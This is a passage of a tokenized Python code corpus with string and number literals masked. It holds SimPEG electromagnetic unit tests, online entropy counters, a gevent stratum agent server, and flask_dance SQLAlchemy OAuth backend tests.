<EOL> pFunction = lambda x , y : np . exp ( x + y ) <EOL> elif testDim == <NUM_LIT:3> : <EOL> pFunction = lambda x , y , z : np . 
exp ( x + y + z ) <EOL> sigma = scalarConductivity ( ccMesh , pFunction ) <EOL> M . plotImage ( sigma ) <EOL> print sigma <EOL> print '<STR_LIT>' <EOL> plt . show ( ) </s>
<s> import unittest <EOL> from SimPEG import * <EOL> from SimPEG import EM <EOL> import sys <EOL> from scipy . constants import mu_0 <EOL> from SimPEG . EM . Utils . testingUtils import getFDEMProblem , crossCheckTest <EOL> testEB = True <EOL> testHJ = True <EOL> testEJ = True <EOL> testBH = True <EOL> verbose = False <EOL> TOLEBHJ = <NUM_LIT> <EOL> TOLEJHB = <NUM_LIT:1> <EOL> SrcList = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class FDEM_CrossCheck ( unittest . TestCase ) : <EOL> if testEB : <EOL> def test_EB_CrossCheck_exr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_eyr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_ezr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_exi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_eyi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_ezi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_bxr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_byr_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_bzr_Eform ( self ) : <EOL> self . 
assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_bxi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_byi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_EB_CrossCheck_bzi_Eform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT:e>' , '<STR_LIT:b>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> if testHJ : <EOL> def test_HJ_CrossCheck_jxr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jyr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jzr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jxi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jyi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_jzi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hxr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hyr_Jform ( self ) : <EOL> self . 
assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hzr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hxi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hyi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hzi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> import SimPEG as simpeg <EOL> from SimPEG import MT <EOL> from SimPEG . Utils import meshTensor <EOL> import numpy as np <EOL> TOLr = <NUM_LIT> <EOL> TOLp = <NUM_LIT> <EOL> def setupSurvey ( sigmaHalf , tD = True ) : <EOL> nFreq = <NUM_LIT> <EOL> freqs = np . logspace ( <NUM_LIT:3> , - <NUM_LIT:3> , nFreq ) <EOL> ct = <NUM_LIT:5> <EOL> air = meshTensor ( [ ( ct , <NUM_LIT> , <NUM_LIT> ) ] ) <EOL> core = np . concatenate ( ( np . kron ( meshTensor ( [ ( ct , <NUM_LIT:15> , - <NUM_LIT> ) ] ) , np . ones ( ( <NUM_LIT:10> , ) ) ) , meshTensor ( [ ( ct , <NUM_LIT:20> ) ] ) ) ) <EOL> bot = meshTensor ( [ ( core [ <NUM_LIT:0> ] , <NUM_LIT:15> , - <NUM_LIT> ) ] ) <EOL> x0 = - np . array ( [ np . sum ( np . concatenate ( ( core , bot ) ) ) ] ) <EOL> m1d = simpeg . Mesh . TensorMesh ( [ np . concatenate ( ( bot , core , air ) ) ] , x0 = x0 ) <EOL> sigma = np . zeros ( m1d . nC ) + sigmaHalf <EOL> sigma [ m1d . gridCC > <NUM_LIT:0> ] = <NUM_LIT> <EOL> sigmaBack = sigma . copy ( ) <EOL> shallow = ( m1d . gridCC < - <NUM_LIT:200> ) * ( m1d . gridCC > - <NUM_LIT> ) <EOL> deep = ( m1d . gridCC < - <NUM_LIT> ) * ( m1d . gridCC > - <NUM_LIT> ) <EOL> sigma [ shallow ] = <NUM_LIT:1> <EOL> sigma [ deep ] = <NUM_LIT:0.1> <EOL> rxList = [ ] <EOL> for rxType in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> rxList . append ( MT . Rx ( simpeg . mkvc ( np . array ( [ <NUM_LIT:0.0> ] ) , <NUM_LIT:2> ) . T , rxType ) ) <EOL> srcList = [ ] <EOL> if tD : <EOL> for freq in freqs : <EOL> srcList . append ( MT . SrcMT . polxy_1DhomotD ( rxList , freq ) ) <EOL> else : <EOL> for freq in freqs : <EOL> srcList . append ( MT . SrcMT . polxy_1Dprimary ( rxList , freq ) ) <EOL> survey = MT . Survey ( srcList ) <EOL> return survey , sigma , m1d <EOL> def getAppResPhs ( MTdata ) : <EOL> def appResPhs ( freq , z ) : <EOL> app_res = ( ( <NUM_LIT:1.> / ( <NUM_LIT> * np . pi ** <NUM_LIT:2> ) ) / freq ) * np . abs ( z ) ** <NUM_LIT:2> <EOL> app_phs = np . arctan2 ( z . imag , z . 
real ) * ( <NUM_LIT> / np . pi ) <EOL> return app_res , app_phs <EOL> zList = [ ] <EOL> for src in MTdata . survey . srcList : <EOL> zc = [ src . freq ] <EOL> for rx in src . rxList : <EOL> if '<STR_LIT:i>' in rx . rxType : <EOL> m = <NUM_LIT> <EOL> else : <EOL> m = <NUM_LIT:1> <EOL> zc . append ( m * MTdata [ src , rx ] ) <EOL> zList . append ( zc ) <EOL> return [ appResPhs ( zList [ i ] [ <NUM_LIT:0> ] , np . sum ( zList [ i ] [ <NUM_LIT:1> : <NUM_LIT:3> ] ) ) for i in np . arange ( len ( zList ) ) ] <EOL> def calculateAnalyticSolution ( srcList , mesh , model ) : <EOL> surveyAna = MT . Survey ( srcList ) <EOL> data1D = MT . Data ( surveyAna ) <EOL> for src in surveyAna . srcList : <EOL> elev = src . rxList [ <NUM_LIT:0> ] . locs [ <NUM_LIT:0> ] <EOL> anaEd , anaEu , anaHd , anaHu = MT . Utils . MT1Danalytic . getEHfields ( mesh , model , src . freq , elev ) <EOL> anaE = anaEd + anaEu <EOL> anaH = anaHd + anaHu <EOL> anaZ = anaE / anaH <EOL> for rx in src . rxList : <EOL> data1D [ src , rx ] = getattr ( anaZ , rx . projComp ) <EOL> return data1D <EOL> def dataMis_AnalyticTotalDomain ( sigmaHalf ) : <EOL> surveyTD , sigma , mesh = setupSurvey ( sigmaHalf ) <EOL> problemTD = MT . Problem1D . eForm_TotalField ( mesh ) <EOL> problemTD . pair ( surveyTD ) <EOL> dataAnaObj = calculateAnalyticSolution ( surveyTD . srcList , mesh , sigma ) <EOL> dataTD = surveyTD . dpred ( sigma ) <EOL> dataAna = simpeg . mkvc ( dataAnaObj ) <EOL> return np . all ( ( dataTD - dataAna ) / dataAna < <NUM_LIT> ) <EOL> def dataMis_AnalyticPrimarySecondary ( sigmaHalf ) : <EOL> surveyPS , sigmaPS , mesh = setupSurvey ( sigmaHalf , tD = False ) <EOL> problemPS = MT . Problem1D . eForm_psField ( mesh ) <EOL> problemPS . sigmaPrimary = sigmaPS <EOL> problemPS . pair ( surveyPS ) <EOL> dataAnaObj = calculateAnalyticSolution ( surveyPS . srcList , mesh , sigmaPS ) <EOL> dataPS = surveyPS . dpred ( sigmaPS ) <EOL> dataAna = simpeg . mkvc ( dataAnaObj ) <EOL> return np . 
all ( ( dataPS - dataAna ) / dataAna < <NUM_LIT> ) <EOL> class TestNumericVsAnalytics ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def test_appRes2en2_ps ( self ) : self . assertTrue ( dataMis_AnalyticPrimarySecondary ( <NUM_LIT> ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import math <EOL> import numpy <EOL> from collections import defaultdict <EOL> class Counter ( defaultdict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , target ) : <EOL> super ( Counter , self ) . __init__ ( int ) <EOL> self . target = target <EOL> self . total = <NUM_LIT:0> <EOL> def add ( self , example ) : <EOL> value = self . target ( example ) <EOL> self [ value ] += <NUM_LIT:1> <EOL> self . total += <NUM_LIT:1> <EOL> class OnlineEntropy ( Counter ) : <EOL> def get_entropy ( self ) : <EOL> s = <NUM_LIT:0.0> <EOL> for count in self . itervalues ( ) : <EOL> p = count / float ( self . total ) <EOL> s += p * math . log ( p , <NUM_LIT:2> ) <EOL> return - s <EOL> class OnlineInformationGain ( object ) : <EOL> def __init__ ( self , attribute , target ) : <EOL> self . attribute = attribute <EOL> self . H = OnlineEntropy ( target ) <EOL> self . G = defaultdict ( lambda : OnlineEntropy ( target ) ) <EOL> def add ( self , example ) : <EOL> self . H . add ( example ) <EOL> value = self . attribute ( example ) <EOL> self . G [ value ] . add ( example ) <EOL> def get_target_class_counts ( self ) : <EOL> return self . H <EOL> def get_branches ( self ) : <EOL> return self . G . items ( ) <EOL> def get_gain ( self ) : <EOL> H1 = self . H . get_entropy ( ) <EOL> H2 = <NUM_LIT:0.0> <EOL> for G in self . G . itervalues ( ) : <EOL> w = G . total / float ( self . H . total ) <EOL> H2 += w * G . get_entropy ( ) <EOL> return H1 - H2 <EOL> class OnlineLogProbability ( object ) : <EOL> def __init__ ( self ) : <EOL> self . d = defaultdict ( int ) <EOL> self . _logtotal = None <EOL> def add ( self , x ) : <EOL> if self . _logtotal is not None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . d [ x ] += <NUM_LIT:1> <EOL> def __getitem__ ( self , x ) : <EOL> if x not in self : <EOL> raise KeyError ( x ) <EOL> if self . _logtotal is None : <EOL> self . _logtotal = numpy . log ( sum ( self . d . itervalues ( ) ) ) <EOL> return numpy . log ( self . d [ x ] ) - self . 
_logtotal <EOL> def __contains__ ( self , x ) : <EOL> return x in self . d <EOL> def __iter__ ( self ) : <EOL> return iter ( self . d ) <EOL> def __len__ ( self ) : <EOL> return len ( self . d ) <EOL> def iteritems ( self ) : <EOL> for x in self . d : <EOL> yield x , self [ x ] </s>
<s> import json <EOL> import socket <EOL> from time import time <EOL> from gevent . queue import Queue <EOL> from gevent . pool import Pool <EOL> from gevent . server import StreamServer <EOL> from gevent import with_timeout <EOL> from . server import GenericClient <EOL> from . lib import Component , loop <EOL> from . exceptions import LoopExit <EOL> class AgentServer ( Component , StreamServer ) : <EOL> """<STR_LIT>""" <EOL> _spawn = None <EOL> def __init__ ( self , stratum_server ) : <EOL> self . server = stratum_server <EOL> self . config = stratum_server . config <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . logger = self . server . logger <EOL> self . listener = ( self . config [ '<STR_LIT:address>' ] , <EOL> self . config [ '<STR_LIT:port>' ] + <EOL> self . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] + <EOL> self . server . manager . config [ '<STR_LIT>' ] ) <EOL> StreamServer . __init__ ( self , self . listener , spawn = Pool ( ) ) <EOL> self . logger . info ( "<STR_LIT>" . format ( self . listener ) ) <EOL> StreamServer . start ( self , * args , ** kwargs ) <EOL> Component . start ( self ) <EOL> def stop ( self , * args , ** kwargs ) : <EOL> self . logger . info ( "<STR_LIT>" . format ( self . listener ) ) <EOL> StreamServer . close ( self ) <EOL> for serv in self . server . agent_clients . values ( ) : <EOL> serv . stop ( ) <EOL> Component . stop ( self ) <EOL> self . logger . info ( "<STR_LIT>" ) <EOL> def handle ( self , sock , address ) : <EOL> self . logger . info ( "<STR_LIT>" <EOL> . format ( address , sock ) ) <EOL> self . server . agent_id_count += <NUM_LIT:1> <EOL> client = AgentClient ( <EOL> sock = sock , <EOL> address = address , <EOL> id = self . server . agent_id_count , <EOL> server = self . server , <EOL> config = self . config , <EOL> logger = self . logger , <EOL> reporter = self . server . reporter ) <EOL> client . 
start ( ) <EOL> class AgentClient ( GenericClient ) : <EOL> """<STR_LIT>""" <EOL> errors = { <EOL> <NUM_LIT:20> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT:30> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT:32> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self , sock , address , id , server , config , logger , reporter ) : <EOL> self . logger = logger <EOL> self . sock = sock <EOL> self . server = server <EOL> self . config = config <EOL> self . reporter = reporter <EOL> sock . setsockopt ( socket . SOL_TCP , socket . TCP_KEEPIDLE , <NUM_LIT> ) <EOL> sock . setsockopt ( socket . SOL_TCP , socket . TCP_KEEPINTVL , <NUM_LIT:1> ) <EOL> sock . setsockopt ( socket . SOL_TCP , socket . TCP_KEEPCNT , <NUM_LIT:5> ) <EOL> self . _disconnected = False <EOL> self . _authenticated = False <EOL> self . _client_state = None <EOL> self . _authed = { } <EOL> self . _client_version = None <EOL> self . _connection_time = time ( ) <EOL> self . _id = id <EOL> self . write_queue = Queue ( ) <EOL> self . fp = None <EOL> self . _stopped = False <EOL> @ property <EOL> def summary ( self ) : <EOL> return dict ( workers = self . _authed , <EOL> connection_time = self . _connection_time_dt ) <EOL> def send_error ( self , num = <NUM_LIT:20> ) : <EOL> """<STR_LIT>""" <EOL> err = { '<STR_LIT:result>' : None , '<STR_LIT:error>' : ( num , self . errors [ num ] , None ) } <EOL> self . logger . debug ( "<STR_LIT>" . format ( err ) ) <EOL> self . write_queue . put ( json . dumps ( err , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT::>' ) ) + "<STR_LIT:\n>" ) <EOL> def send_success ( self ) : <EOL> """<STR_LIT>""" <EOL> succ = { '<STR_LIT:result>' : True , '<STR_LIT:error>' : None } <EOL> self . logger . debug ( "<STR_LIT>" . format ( succ ) ) <EOL> self . write_queue . put ( json . 
dumps ( succ , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT::>' ) ) + "<STR_LIT:\n>" ) <EOL> @ loop ( fin = '<STR_LIT>' , exit_exceptions = ( socket . error , ) ) <EOL> def read ( self ) : <EOL> if self . _disconnected : <EOL> self . logger . info ( "<STR_LIT>" <EOL> . format ( self . _id ) ) <EOL> return <EOL> line = with_timeout ( self . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> self . fp . readline , <EOL> timeout_value = '<STR_LIT>' ) <EOL> if line == '<STR_LIT>' : <EOL> raise LoopExit ( "<STR_LIT>" ) <EOL> line = line . strip ( ) <EOL> if not line : <EOL> raise LoopExit ( "<STR_LIT>" ) <EOL> try : <EOL> data = json . loads ( line ) <EOL> except ValueError : <EOL> self . logger . info ( "<STR_LIT>" . format ( line ) ) <EOL> self . send_error ( ) <EOL> return <EOL> self . logger . debug ( "<STR_LIT>" . format ( data , self . _id ) ) <EOL> if '<STR_LIT>' not in data : <EOL> self . logger . info ( "<STR_LIT>" . format ( data ) ) <EOL> self . send_error ( ) <EOL> meth = data [ '<STR_LIT>' ] . lower ( ) <EOL> if meth == '<STR_LIT:hello>' : <EOL> if self . _client_version is not None : <EOL> self . send_error ( <NUM_LIT:32> ) <EOL> return <EOL> self . _client_version = data . get ( '<STR_LIT>' , [ <NUM_LIT:0.1> ] ) [ <NUM_LIT:0> ] <EOL> self . logger . info ( "<STR_LIT>" <EOL> . format ( self . _id , self . _client_version ) ) <EOL> elif meth == '<STR_LIT>' : <EOL> if self . _client_version is None : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> username = data . get ( '<STR_LIT>' , [ "<STR_LIT>" ] ) [ <NUM_LIT:0> ] <EOL> user_worker = self . convert_username ( username ) <EOL> self . client_state = self . server . address_worker_lut . get ( user_worker ) <EOL> if not self . client_state : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> self . _authed [ username ] = user_worker <EOL> self . send_success ( ) <EOL> self . logger . info ( "<STR_LIT>" <EOL> . format ( self . _id , username ) ) <EOL> elif meth == "<STR_LIT>" : <EOL> if self . 
_client_version is None : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if data . get ( '<STR_LIT>' , [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] not in self . _authed : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if '<STR_LIT>' not in data or len ( data [ '<STR_LIT>' ] ) != <NUM_LIT:4> : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> user_worker , typ , data , stamp = data [ '<STR_LIT>' ] <EOL> address , worker = self . _authed [ user_worker ] <EOL> if typ in self . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> self . reporter . agent_send ( address , worker , typ , data , stamp ) <EOL> self . send_success ( ) <EOL> self . logger . info ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( self . _id , address , worker , typ , len ( line ) ) ) <EOL> else : <EOL> self . send_error ( <NUM_LIT> ) </s>
<s> import pytest <EOL> sa = pytest . importorskip ( "<STR_LIT>" ) <EOL> import os <EOL> import responses <EOL> import flask <EOL> from lazy import lazy <EOL> from flask_sqlalchemy import SQLAlchemy <EOL> from sqlalchemy import event <EOL> from sqlalchemy . orm . exc import NoResultFound <EOL> from flask_cache import Cache <EOL> from flask_login import LoginManager , UserMixin , current_user , login_user , logout_user <EOL> from flask_dance . consumer import OAuth2ConsumerBlueprint , oauth_authorized <EOL> from flask_dance . consumer . backend . sqla import OAuthConsumerMixin , SQLAlchemyBackend <EOL> try : <EOL> import blinker <EOL> except ImportError : <EOL> blinker = None <EOL> requires_blinker = pytest . mark . skipif ( not blinker , reason = "<STR_LIT>" ) <EOL> pytestmark = [ <EOL> pytest . mark . usefixtures ( "<STR_LIT>" ) , <EOL> ] <EOL> @ pytest . fixture <EOL> def blueprint ( ) : <EOL> bp = OAuth2ConsumerBlueprint ( "<STR_LIT>" , __name__ , <EOL> client_id = "<STR_LIT>" , <EOL> client_secret = "<STR_LIT>" , <EOL> state = "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> authorization_url = "<STR_LIT>" , <EOL> token_url = "<STR_LIT>" , <EOL> redirect_url = "<STR_LIT>" , <EOL> ) <EOL> responses . add ( <EOL> responses . POST , <EOL> "<STR_LIT>" , <EOL> body = '<STR_LIT>' , <EOL> ) <EOL> return bp <EOL> @ pytest . fixture <EOL> def db ( ) : <EOL> return SQLAlchemy ( ) <EOL> @ pytest . fixture <EOL> def app ( blueprint , db , request ) : <EOL> app = flask . Flask ( __name__ ) <EOL> app . config [ "<STR_LIT>" ] = os . environ . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> app . config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> app . secret_key = "<STR_LIT>" <EOL> app . register_blueprint ( blueprint , url_prefix = "<STR_LIT>" ) <EOL> db . init_app ( app ) <EOL> ctx = app . app_context ( ) <EOL> ctx . push ( ) <EOL> request . addfinalizer ( ctx . 
pop ) <EOL> return app <EOL> class record_queries ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , target , identifier = "<STR_LIT>" ) : <EOL> self . target = target <EOL> self . identifier = identifier <EOL> def record_query ( self , conn , cursor , statement , parameters , context , executemany ) : <EOL> self . queries . append ( statement ) <EOL> def __enter__ ( self ) : <EOL> self . queries = [ ] <EOL> event . listen ( self . target , self . identifier , self . record_query ) <EOL> return self . queries <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> event . remove ( self . target , self . identifier , self . record_query ) <EOL> def test_sqla_backend_without_user ( app , db , blueprint , request ) : <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:2> <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert isinstance ( oauth . token , dict ) <EOL> assert oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> def test_sqla_model_repr ( app , db , request ) : <EOL> class MyAwesomeOAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> db . 
create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> o = MyAwesomeOAuth ( ) <EOL> assert "<STR_LIT>" in repr ( o ) <EOL> o . provider = "<STR_LIT>" <EOL> assert '<STR_LIT>' in repr ( o ) <EOL> o . token = { "<STR_LIT>" : "<STR_LIT>" } <EOL> assert "<STR_LIT>" not in repr ( o ) <EOL> db . session . add ( o ) <EOL> db . session . commit ( ) <EOL> assert "<STR_LIT>" in repr ( o ) <EOL> assert "<STR_LIT>" not in repr ( o ) <EOL> def test_sqla_backend ( app , db , blueprint , request ) : <EOL> class User ( db . Model ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> alice = User ( name = "<STR_LIT>" ) <EOL> db . session . add ( alice ) <EOL> db . session . commit ( ) <EOL> alice . id <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , user = alice ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:3> <EOL> alice = User . query . first ( ) <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . user_id == alice . id <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert isinstance ( oauth . 
token , dict ) <EOL> assert oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> def test_sqla_load_token_for_user ( app , db , blueprint , request ) : <EOL> class User ( db . Model ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session ) <EOL> alice = User ( name = "<STR_LIT>" ) <EOL> alice_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> alice_oauth = OAuth ( user = alice , token = alice_token , provider = "<STR_LIT>" ) <EOL> bob = User ( name = "<STR_LIT>" ) <EOL> bob_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> bob_oauth = OAuth ( user = bob , token = bob_token , provider = "<STR_LIT>" ) <EOL> sue = User ( name = "<STR_LIT>" ) <EOL> sue_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> sue_oauth = OAuth ( user = sue , token = sue_token , provider = "<STR_LIT>" ) <EOL> db . session . add_all ( [ alice , bob , sue , alice_oauth , bob_oauth , sue_oauth ] ) <EOL> db . session . commit ( ) <EOL> sess = blueprint . session <EOL> assert not sess . token <EOL> assert not blueprint . token <EOL> blueprint . config [ "<STR_LIT:user>" ] = alice <EOL> assert sess . token == alice_token <EOL> assert blueprint . token == alice_token <EOL> blueprint . config [ "<STR_LIT:user>" ] = bob <EOL> assert sess . token == bob_token <EOL> assert blueprint . token == bob_token <EOL> blueprint . config [ "<STR_LIT:user>" ] = alice <EOL> assert sess . 
token == alice_token <EOL> assert blueprint . token == alice_token <EOL> blueprint . config [ "<STR_LIT:user>" ] = sue <EOL> assert sess . token == sue_token <EOL> assert blueprint . token == sue_token <EOL> del blueprint . config [ "<STR_LIT:user>" ] <EOL> blueprint . config [ "<STR_LIT>" ] = bob . id <EOL> assert sess . token == bob_token <EOL> assert blueprint . token == bob_token <EOL> del blueprint . token <EOL> assert sess . token == None <EOL> assert blueprint . token == None <EOL> blueprint . config [ "<STR_LIT>" ] = alice . id <EOL> assert sess . token == alice_token <EOL> assert blueprint . token == alice_token <EOL> def test_sqla_flask_login ( app , db , blueprint , request ) : <EOL> login_manager = LoginManager ( app ) <EOL> class User ( db . Model , UserMixin ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db 